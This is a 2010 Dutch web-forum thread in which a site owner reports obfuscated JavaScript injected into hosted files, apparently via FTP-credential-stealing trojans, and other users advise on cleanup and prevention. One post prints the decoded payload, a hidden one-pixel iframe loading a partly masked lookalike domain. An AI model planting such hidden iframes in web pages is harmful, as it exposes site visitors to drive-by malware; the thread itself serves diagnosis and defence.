Vage javascript toegevoegd aan mijn site

dinsdag 11 mei 2010 23:08

Acties:

0 Henk 'm!

Topicstarter

Onderstaande javascript is op mijn hostingaccount toegevoegd aan enkele files, schijnt dat dit wel vaker gebeurt en veroorzaakt wordt door trojans die ftp gegevens verzamelen; kan iemand onderstaande code leesbaar maken / een hint geven hoe dat te doen?

code:

1	snip weg

[ Voor 78% gewijzigd door RobIII op 11-05-2010 23:13 ]

dinsdag 11 mei 2010 23:09

Acties:

0 Henk 'm!

Wiethoofd

Broadcast TOM

[code=JavaScript] geeft je hier op het forum iig highlighting

Volg me op Twitter/X & Bluesky

dinsdag 11 mei 2010 23:11

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Waarom zou je dat willen? Haal het er gewoon uit en zorg dat je wachtwoord gewijzigd wordt (en beter: doe een reinstall wanneer mogelijk).

Als je het echt wil: vervang de eval(....) door iets waar je de code mee output

[ Voor 23% gewijzigd door RobIII op 11-05-2010 23:12 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 11 mei 2010 23:11

Acties:

0 Henk 'm!

Verwijderd

Met AVG aan kom ik al niet eens in dit topic, hij blokkeert hem omdat er inderdaad een malicious script op zit, puur ter informatie

dinsdag 11 mei 2010 23:13

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Verwijderd schreef op dinsdag 11 mei 2010 @ 23:11:
Met AVG aan kom ik al niet eens in dit topic, hij blokkeert hem omdat er inderdaad een malicious script op zit, puur ter informatie

In dat geval is de code weg; we hebben geen zin in allerlei virusscanners die afgaan op dit topic (ook al is het niet kwaadaardig noch uitvoerbaar).

Voor de geïnteresseerden: decoded:

code:

1	document.write('<iframe src="http://messenger.***.com/show.php" width="1" height="1" style="display:none;"></iframe>')

Waar *** = live.de

[ Voor 33% gewijzigd door RobIII op 11-05-2010 23:20 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 11 mei 2010 23:20

Acties:

0 Henk 'm!

Verwijderd

JavaScript:

*snip*

staat er

Ik heb 't hier weer weggehaald omdat de string literal waarschijnlijk al AV tools doet afgaan

Desalniettemin stond hier hetzelfde als 1 post erboven (en op dezelfde tijd)

[ Voor 102% gewijzigd door RobIII op 11-05-2010 23:42 ]

dinsdag 11 mei 2010 23:21

Acties:

0 Henk 'm!

moto-moi

Ja, ik haat jou ook :w

RobIII schreef op dinsdag 11 mei 2010 @ 23:13:
[...]

In dat geval is de code weg; we hebben geen zin in allerlei virusscanners die afgaan op dit topic (ook al is het niet kwaadaardig noch uitvoerbaar).

Ik vind dat eerder een bug in een virusscanner om heel eerlijk te zijn? Als ik een plaatje laat zien van een virus, wil dat ook niet gelijk betekenen dat je griep krijgt.

God, root, what is difference? | Talga Vassternich | IBM zuigt

dinsdag 11 mei 2010 23:22

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

moto-moi schreef op dinsdag 11 mei 2010 @ 23:21:
[...]

Ik vind dat eerder een bug in een virusscanner om heel eerlijk te zijn?

Dat boeit toch niet? Het feit dat ze afgaan is voldoende om het weg te halen IMHO (of te verhaspelen zodat ze niet afgaan).

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 11 mei 2010 23:23

Acties:

0 Henk 'm!

Verwijderd

Sowieso, het plaatst een verborgen iframe, met daarop een pagina van Microsoft. Wat zouden ze daarmee willen bereiken?

[ Voor 26% gewijzigd door Verwijderd op 11-05-2010 23:24 ]

dinsdag 11 mei 2010 23:24

Acties:

0 Henk 'm!

remco_k

een cassettebandje was genoeg

moto-moi schreef op dinsdag 11 mei 2010 @ 23:21:
[...]

Ik vind dat eerder een bug in een virusscanner om heel eerlijk te zijn? Als ik een plaatje laat zien van een virus, wil dat ook niet gelijk betekenen dat je griep krijgt.

Maar ik heb dan toch liever een false positive dan een false negative...

Alles kan stuk.

dinsdag 11 mei 2010 23:24

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Verwijderd schreef op dinsdag 11 mei 2010 @ 23:23:
Sowieso, het plaatst een iframe, met daarop een pagina van Microsoft (die niet eens bestaat)

Goed kijken

live.de.com

[ Voor 14% gewijzigd door RobIII op 11-05-2010 23:28 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 11 mei 2010 23:26

Acties:

0 Henk 'm!

Mental

Topicstarter

Nou, de virusscanner moet dan bepalen of die code daadwerkelijk uitgevoerd word of dat het enkel op het scherm getoond word.. lijkt me een onnodig zware taak om dat te moeten checken.

Thanks voor de reply in ieder geval, jammer dat ik er verder niets aan heb; afgezien van het feit dat het niet een 'bekende' is geweest die heeft lopen rommelen.
FTP accounts zijn inderdaad al gewijzigd en ook alle pc's hier in huis gescanned, zonder resultaat helaas (met avg en mcafee).

dinsdag 11 mei 2010 23:26

Acties:

0 Henk 'm!

Verwijderd

RobIII schreef op dinsdag 11 mei 2010 @ 23:24:
[...]

Goed kijken
live.de.com

Hmm da's een goeie! Je krijgt ook keurig netjes de MS pagina geserveerd (kreeg wel een 404 de eerste keer) en er staan een paar vreemde tekens bovenin. Ik had hem niet eens door...

edit:

Hmmz; lijkt wel van MS te zijn.

Ja ik twijfel nu ook

[ Voor 40% gewijzigd door Verwijderd op 11-05-2010 23:27 ]

dinsdag 11 mei 2010 23:27

Acties:

0 Henk 'm!

Mental

Topicstarter

RobIII schreef op dinsdag 11 mei 2010 @ 23:24:
[...]

Goed kijken
live.de.com
Hmmz; lijkt wel van MS te zijn.

de.com is niet van microsoft hoor (het is zoals je zelf al zei live.de.com), het is gewoon een kopie van live.de met een hele berg rommelcode erachter.

edit: of je bedoelt natuurlijk dat live.de.com een frame plaatst waar de echte live.de in getoond wordt.

[ Voor 13% gewijzigd door Mental op 11-05-2010 23:28 ]

dinsdag 11 mei 2010 23:27

Acties:

0 Henk 'm!

moto-moi

Ja, ik haat jou ook :w

RobIII schreef op dinsdag 11 mei 2010 @ 23:22:
Dat boeit toch niet? Het feit dat ze afgaan is voldoende om het weg te halen IMHO (of te verhaspelen zodat ze niet afgaan).

Uiteraard, al zou het ook een zeer goede reden zijn om zoiets te melden bij de antivirusproducent

God, root, what is difference? | Talga Vassternich | IBM zuigt

dinsdag 11 mei 2010 23:28

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

moto-moi schreef op dinsdag 11 mei 2010 @ 23:27:
[...]

Uiteraard, al zou het ook een zeer goede reden zijn om zoiets te melden bij de antivirusproducent

Dat kan altijd nog; eerst m'n devschuur schoon houden

Verwijderd schreef op dinsdag 11 mei 2010 @ 23:26:

Ja ik twijfel nu ook

Ik niet meer; 't is geen MS voor zover ik zie

[ Voor 24% gewijzigd door RobIII op 11-05-2010 23:31 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

dinsdag 11 mei 2010 23:29

Acties:

0 Henk 'm!

Eijkb

Zo.

Ik werk zelf bij een hoster en dit komt echt heel regelmatig voor. Het zijn idd trojans die FTP credentials verzamelen en dan en masse die iframe's erop zetten. Als je alles gescanned hebt en niets gevonden moet je beter scannen ;-)

Heb helaas geen tips qua scanners die dit soort trojans wel vinden, maar hou me aanbevolen voor tips (die ik dan weer door kan spelen aan getroffen klanten).

.

dinsdag 11 mei 2010 23:31

Acties:

0 Henk 'm!

Mental

Topicstarter

Eijkb schreef op dinsdag 11 mei 2010 @ 23:29:
Ik werk zelf bij een hoster en dit komt echt heel regelmatig voor. Het zijn idd trojans die FTP credentials verzamelen en dan en masse die iframe's erop zetten. Als je alles gescanned hebt en niets gevonden moet je beter scannen ;-)

Heb helaas geen tips qua scanners die dit soort trojans wel vinden, maar hou me aanbevolen voor tips (die ik dan weer door kan spelen aan getroffen klanten).

Er staan geen wazige files in mijn temp folders / application data folders, er draaien geen rare processen, er zijn geen recente executables in systeemfolders én avg en mcafee vinden beiden niets.
Geeft mij wel een redelijk veilig gevoel en het vermoeden dat het probleem bij iemand anders zit, mijn hoster zelf heeft bijv. aangegeven dat hij er zelf last van heeft gehad.. en wie heeft er toegang tot zijn eigen webservers via ftp? Juist.

woensdag 12 mei 2010 11:30

Acties:

0 Henk 'm!

Verwijderd

Vaak ligt de oorzaak hiervan op de server, dus bij de hosting provider. Maar het is wel verstandig om een fatsoenlijk FTP-programma te gebruiken en deze regelmatig te updaten. En kies indien mogelijk voor connecties via sFTP om te voorkomen dat je inloggegevens afgeluisterd kunnen worden.

woensdag 12 mei 2010 11:37

Acties:

0 Henk 'm!

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

Verwijderd schreef op woensdag 12 mei 2010 @ 11:30:
Maar het is wel verstandig om een fatsoenlijk FTP-programma te gebruiken en deze regelmatig te updaten.

FileZilla is zo'n "fatsoenlijk" FTP programma; alleen slaat 'ie de wachtwoorden niet encrypted op en vertikken ze het daar (telkens weer) om dat aan te passen. Enerzijds hebben ze gelijk; je timmert het maar op FS niveau dicht en zorgt maar voor de juiste rechten; anderzijds maakt dat het werken met FileZilla niet veel makkelijker en is het maar een (relatief) klein beetje werk.

Verwijderd schreef op woensdag 12 mei 2010 @ 11:30:
En kies indien mogelijk voor connecties via sFTP om te voorkomen dat je inloggegevens afgeluisterd kunnen worden.

De kans dat iemand je wachtwoord afluistert is vele, vele male kleiner dan dat 1 of ander vaag virus je wachtwoord gewoon uit "sitemanager" bestanden van je FTP app haalt. Natuurlijk is een secure verbinding te adviseren maar je dient éérst en vooral je werkstation op orde te hebben met een fatsoenlijke virusscanner, dan pas een fatsoenlijk FTP programma waarbij je of geen wachtwoorden opslaat, of de mogelijkheid hebt deze te encrypten, of je regelt het op FS niveau. En dan pas ga je kijken naar sFTP etc.

[ Voor 6% gewijzigd door RobIII op 12-05-2010 11:51 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

woensdag 12 mei 2010 11:59

Acties:

0 Henk 'm!

Bosmonster

*zucht*

Mental schreef op dinsdag 11 mei 2010 @ 23:31:
[...]
en wie heeft er toegang tot zijn eigen webservers via ftp? Juist.

Ik ken weinig hostingpartijen die hun eigen servers beheren via FTP

Dit komt toch 9/10x van de client af via een trojan/keylogger.

[ Voor 11% gewijzigd door Bosmonster op 12-05-2010 12:00 ]

woensdag 12 mei 2010 14:02

Acties:

0 Henk 'm!

Ram0n

Bierbrouwende nerd

Precies, ik heb dit enkele keren moeten oplossen bij wat mensen en telkens was het een keylogger o.i.d. die actief was op hun pc. Malwarebytes Anti-Malware vindt ze 9 van de 10 keer, maar het kan bij een andere variant natuurlijk net weer een andere scanner zijn die meer succes heeft.

Eigenaar/brouwer Milky Road Brewery

maandag 17 mei 2010 19:06

Acties:

0 Henk 'm!

Mental

Topicstarter

Tot op de dag van vandaag niets gevonden op de workstations en geen problemen meer gehad.
2 van de accounts hebben een ander wachtwoord en de 3e nog steeds hetzelfde; 0 ftp activiteit gezien op de 3 accounts. (maar die was er ook niet rond het tijdstip dat de files gewijzigd zijn)

Onderwerpen